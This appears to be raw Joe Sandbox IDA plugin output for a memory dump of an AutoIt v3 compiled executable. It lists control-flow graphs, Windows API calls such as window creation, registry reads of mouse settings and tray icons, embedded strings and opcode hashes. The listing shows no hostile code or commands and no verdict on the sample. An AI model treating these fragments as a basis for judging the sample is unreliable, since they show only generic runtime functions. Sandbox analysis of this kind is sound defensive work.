                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1227 5250db-52514b CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 0052513E
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00525147
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                        • Opcode ID: c0d7727c1e3bace89a511bc4fa23eb1e382f51602a4d80216fe40161b18c207c
                                                                                                                                        • Instruction ID: 007c797cb9e6461510a6f735cd7afc3189693102699e4d736a8c84b8e3f1ada9
                                                                                                                                        • Opcode Fuzzy Hash: c0d7727c1e3bace89a511bc4fa23eb1e382f51602a4d80216fe40161b18c207c
                                                                                                                                        • Instruction Fuzzy Hash: 14F0B7755562A87EEA3157276C48E273F7DE7DBF50F00411BB900A21B0E6711855EAB0

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1228 579b16-579b9b call 524a8c call 579cf1 1233 579ba5-579c31 call 524ab2 * 4 call 524a8c call 53593c * 2 call 524ab2 1228->1233 1234 579b9d 1228->1234 1252 579c36-579c5c call 5796c4 call 578f0e 1233->1252 1236 579b9f-579ba0 1234->1236 1237 579ce8-579cee 1236->1237 1257 579c73-579c77 1252->1257 1258 579c5e-579c6e call 532f85 * 2 1252->1258 1260 579c79-579cd6 call 5790c1 call 532f85 1257->1260 1261 579cd8-579cde call 532f85 1257->1261 1258->1236 1268 579ce0-579ce6 1260->1268 1261->1268 1268->1237
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
                                                                                                                                          • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DE1
                                                                                                                                          • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DF4
                                                                                                                                        • _free.LIBCMT ref: 00579C5F
                                                                                                                                        • _free.LIBCMT ref: 00579C66
                                                                                                                                        • _free.LIBCMT ref: 00579CD1
                                                                                                                                          • Part of subcall function 00532F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532F99
                                                                                                                                          • Part of subcall function 00532F85: GetLastError.KERNEL32(00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532FAB
                                                                                                                                        • _free.LIBCMT ref: 00579CD9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                        • API String ID: 1552873950-2806939583
                                                                                                                                        • Opcode ID: 0b6d4081fb3b9cc2c55c31735e9311414d263114a601b29e9e4ca22fcd66b795
                                                                                                                                        • Instruction ID: f5f68cfaab07755a9bed9f743485bbb8033d6e7150badf32a3fd318be6fc4dc8
                                                                                                                                        • Opcode Fuzzy Hash: 0b6d4081fb3b9cc2c55c31735e9311414d263114a601b29e9e4ca22fcd66b795
                                                                                                                                        • Instruction Fuzzy Hash: E7513EB1904219AFDF24DF64DC45AAEBBB9FF88304F00459EB649A3281D7715E80CF58

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1272 53563d-535656 1273 535673 1272->1273 1274 535658-53565d 1272->1274 1275 535675-53567b 1273->1275 1274->1273 1276 53565f-535661 1274->1276 1277 535663-535668 call 538d58 1276->1277 1278 53567c-535681 1276->1278 1286 53566e call 538fe6 1277->1286 1279 535683-53568d 1278->1279 1280 53568f-535693 1278->1280 1279->1280 1283 5356b3-5356c2 1279->1283 1284 5356a3-5356a5 1280->1284 1285 535695-5356a0 call 533010 1280->1285 1289 5356c4-5356c7 1283->1289 1290 5356c9 1283->1290 1284->1277 1288 5356a7-5356b1 1284->1288 1285->1284 1286->1273 1288->1277 1288->1283 1291 5356ce-5356d3 1289->1291 1290->1291 1294 5356d9-5356e0 1291->1294 1295 5357bc-5357bf 1291->1295 1296 5356e2-5356ea 1294->1296 1297 535721-535723 1294->1297 1295->1275 1296->1297 1298 5356ec 1296->1298 1299 535725-535727 1297->1299 1300 53578d-53578e call 540dd7 1297->1300 1301 5356f2-5356f4 1298->1301 1302 5357ea 1298->1302 1303 53574b-535756 1299->1303 1304 535729-535731 1299->1304 1313 535793-535797 1300->1313 1308 5356f6-5356f8 1301->1308 1309 5356fb-535700 1301->1309 1310 5357ee-5357f7 1302->1310 1306 53575a-53575d 1303->1306 1307 535758 1303->1307 1311 535733-53573f 1304->1311 1312 535741-535745 1304->1312 1314 5357c4-5357c8 1306->1314 1315 53575f-53576b call 534906 call 54108b 1306->1315 1307->1306 1308->1309 1309->1314 1316 535706-53571f call 540ef8 1309->1316 1310->1275 1317 535747-535749 1311->1317 1312->1317 1313->1310 1318 535799-53579e 1313->1318 1319 5357da-5357e5 call 538d58 1314->1319 1320 5357ca-5357d7 call 533010 1314->1320 1333 535770-535775 1315->1333 1332 535782-53578b 1316->1332 1317->1306 1318->1314 1323 5357a0-5357b1 1318->1323 1319->1286 1320->1319 1324 5357b4-5357b6 1323->1324 1324->1294 1324->1295 1332->1324 1334 53577b-53577e 1333->1334 1335 5357fc-535800 1333->1335 1334->1302 1336 535780 1334->1336 1335->1310 1336->1332
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1559183368-0
                                                                                                                                        • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                                                        • Instruction ID: f942008573a7ba7c33734cde984ec14da20b05a26a7486fbf7c02bc36b9eee29
                                                                                                                                        • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                                                        • Instruction Fuzzy Hash: 2951B070A00B06DBDB288FB9C8856AE7FA5FF40360F249B29F825962D0E7709D509B40
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051534A
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00515356
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00515360
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1795658109-0
                                                                                                                                        • Opcode ID: cbb628decd652934847348bf168df2e9b8ca5c42e5ff32e311906122b21b51d4
                                                                                                                                        • Instruction ID: 1d326561d94382401cce0a0d6d342ed0a70b8ce8235f097b301f15c43f044382
                                                                                                                                        • Opcode Fuzzy Hash: cbb628decd652934847348bf168df2e9b8ca5c42e5ff32e311906122b21b51d4
                                                                                                                                        • Instruction Fuzzy Hash: 0C319F3050874AEAEB308F64D844BE97FA8BB95344F14085BE522971D1F7B5A8C9E721
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112A8
                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112C9
                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                        • Opcode ID: d02c319b10cd95d21399fbadef9518797707d31f40a29140cf69d9788c02997b
                                                                                                                                        • Instruction ID: 186c6eb203304e2d6b9c2f3b55bbeca7614b214977e260c9f318afdd741b763c
                                                                                                                                        • Opcode Fuzzy Hash: d02c319b10cd95d21399fbadef9518797707d31f40a29140cf69d9788c02997b
                                                                                                                                        • Instruction Fuzzy Hash: AF115A75515608BFEB208FA5DC84EEFBBB8FF05740F004999F915D7110E2719E84A7A8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0053593C: __FF_MSGBANNER.LIBCMT ref: 00535953
                                                                                                                                          • Part of subcall function 0053593C: __NMSG_WRITE.LIBCMT ref: 0053595A
                                                                                                                                          • Part of subcall function 0053593C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,?,00000004,?,?,00531003,?), ref: 0053597F
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0053101C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00531031
                                                                                                                                          • Part of subcall function 005387CB: RaiseException.KERNEL32(?,?,?,005CCAF8,?,?,?,?,?,00531036,?,005CCAF8,?,00000001), ref: 00538820
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                        • String ID: `=Z$h=Z
                                                                                                                                        • API String ID: 3902256705-1415512615
                                                                                                                                        • Opcode ID: 3a8f6a7a992837ad8b664352e721e2e557ea8f1204d28f98764a1b336b6c7d66
                                                                                                                                        • Instruction ID: 011b34abea63e9023a87d187c04850714c3260d31f2f9eb08ca056111ee7ee98
                                                                                                                                        • Opcode Fuzzy Hash: 3a8f6a7a992837ad8b664352e721e2e557ea8f1204d28f98764a1b336b6c7d66
                                                                                                                                        • Instruction Fuzzy Hash: A6F0A43550471EE6CB28AAA8DC1DAEEBFACBF41354F100465F914A2191EFB18B80C2A4
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00525B58
                                                                                                                                          • Part of subcall function 005256F8: _memset.LIBCMT ref: 00525787
                                                                                                                                          • Part of subcall function 005256F8: _wcscpy.LIBCMT ref: 005257DB
                                                                                                                                          • Part of subcall function 005256F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00525BAD
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00525BBC
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00560D7C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                        • Opcode ID: 55b7a018703720e78e294007ab2aee56386ac5d4181cf6500f36236bebd8eb76
                                                                                                                                        • Instruction ID: f95d9878fa874791137718fe3d27c036fb7cd5b65ae6d8b77b4d4ce089309bc3
                                                                                                                                        • Opcode Fuzzy Hash: 55b7a018703720e78e294007ab2aee56386ac5d4181cf6500f36236bebd8eb76
                                                                                                                                        • Instruction Fuzzy Hash: A921F570904794AFE7728B24D899BEBBFECBF12304F00158EE69A571C1D3746988DB41
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005249C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
                                                                                                                                        • _free.LIBCMT ref: 0055FB04
                                                                                                                                        • _free.LIBCMT ref: 0055FB4B
                                                                                                                                          • Part of subcall function 005229BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
                                                                                                                                        Strings
                                                                                                                                        • Bad directive syntax error, xrefs: 0055FB33
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                        • String ID: Bad directive syntax error
                                                                                                                                        • API String ID: 2861923089-2118420937
                                                                                                                                        • Opcode ID: 2dd3b8e100d686dda04d36f6e8147b80f604172e5bfd2e963a3d614e8fbf7f46
                                                                                                                                        • Instruction ID: 458e5f198012793b67904ae6ddbb91d9fd184535ce43fe074c05878ceb6f985f
                                                                                                                                        • Opcode Fuzzy Hash: 2dd3b8e100d686dda04d36f6e8147b80f604172e5bfd2e963a3d614e8fbf7f46
                                                                                                                                        • Instruction Fuzzy Hash: 7191707191022AEFCF04EFA4D8559EEBFB4FF49311F14452AF815AB2A1DB309949CB90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: AU3! ?Z$EA06
                                                                                                                                        • API String ID: 4104443479-1020467815
                                                                                                                                        • Opcode ID: 7d2480c3b7ebb803f4bdacf43731ba740462a30a07523f67288755be71e316ec
                                                                                                                                        • Instruction ID: 7caf76302b568214b138e5cab1302250eb347a02298b062195f52e89b0901f8e
                                                                                                                                        • Opcode Fuzzy Hash: 7d2480c3b7ebb803f4bdacf43731ba740462a30a07523f67288755be71e316ec
                                                                                                                                        • Instruction Fuzzy Hash: D0418F21A041785BDF21DB64A8557BF7FA5BF97310F284475E882EB2C6D6208DC4CBE1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00524AB2: __fread_nolock.LIBCMT ref: 00524AD0
                                                                                                                                        • _wcscmp.LIBCMT ref: 00579DE1
                                                                                                                                        • _wcscmp.LIBCMT ref: 00579DF4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                                        • String ID: FILE
                                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                                        • Opcode ID: ae3e9cc5e713eafa4d7d588e0af018d294c801f686a7497b2ae921e648929ffa
                                                                                                                                        • Instruction ID: fd101452a179986f2b86a944a4e74e1280d873e54e6d7756fa0dc9a8a6bb6528
                                                                                                                                        • Opcode Fuzzy Hash: ae3e9cc5e713eafa4d7d588e0af018d294c801f686a7497b2ae921e648929ffa
                                                                                                                                        • Instruction Fuzzy Hash: AA41FB71A4021ABADF20DAA4DC49FEF7FBEFF85710F004469F904A7190D771A9449B64
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0056032B
                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00560375
                                                                                                                                          • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
                                                                                                                                          • Part of subcall function 005309C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 005309E4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 3777226403-3081909835
                                                                                                                                        • Opcode ID: 5788ca033e7f0d622dc083561553d423f02f5c207f4f0926c995e4353251d1cf
                                                                                                                                        • Instruction ID: ae405c7dd84da14f1173001bac92b89d3c90c4e8eb0c3d0fc34737cd34d1322d
                                                                                                                                        • Opcode Fuzzy Hash: 5788ca033e7f0d622dc083561553d423f02f5c207f4f0926c995e4353251d1cf
                                                                                                                                        • Instruction Fuzzy Hash: DA21A175A002989BCB41DFD4D849BEE7FF8BF4A304F00405AE404A7281DBB85A88DFA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b3985325c6efa8fe6e31068fed31140237f94c39fff897788fda1d8adbda5812
                                                                                                                                        • Instruction ID: a7dba5f07a9d3ab9df5ee713508ee85ebe7d6ba88984133771a93ae684c20a04
                                                                                                                                        • Opcode Fuzzy Hash: b3985325c6efa8fe6e31068fed31140237f94c39fff897788fda1d8adbda5812
                                                                                                                                        • Instruction Fuzzy Hash: DDF117706083059FCB14EF28C484A6ABBE5FFC9314F14892EF8999B291D770E945CF92
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 1b294a5719273f9dc6cb0906a1ab30d8138ec109d3bbf1f5e1c276df9b69a8ea
                                                                                                                                        • Instruction ID: 84b1aecef4048befce7493d4752f79bc674ac6d4351d8fbe823ef2096628756b
                                                                                                                                        • Opcode Fuzzy Hash: 1b294a5719273f9dc6cb0906a1ab30d8138ec109d3bbf1f5e1c276df9b69a8ea
                                                                                                                                        • Instruction Fuzzy Hash: 6061FF71600A09EBDF048F25E984AAE7BB4FF94310F1985A9EC09CF295EB31D960CB44
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005259F9
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00525ABB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
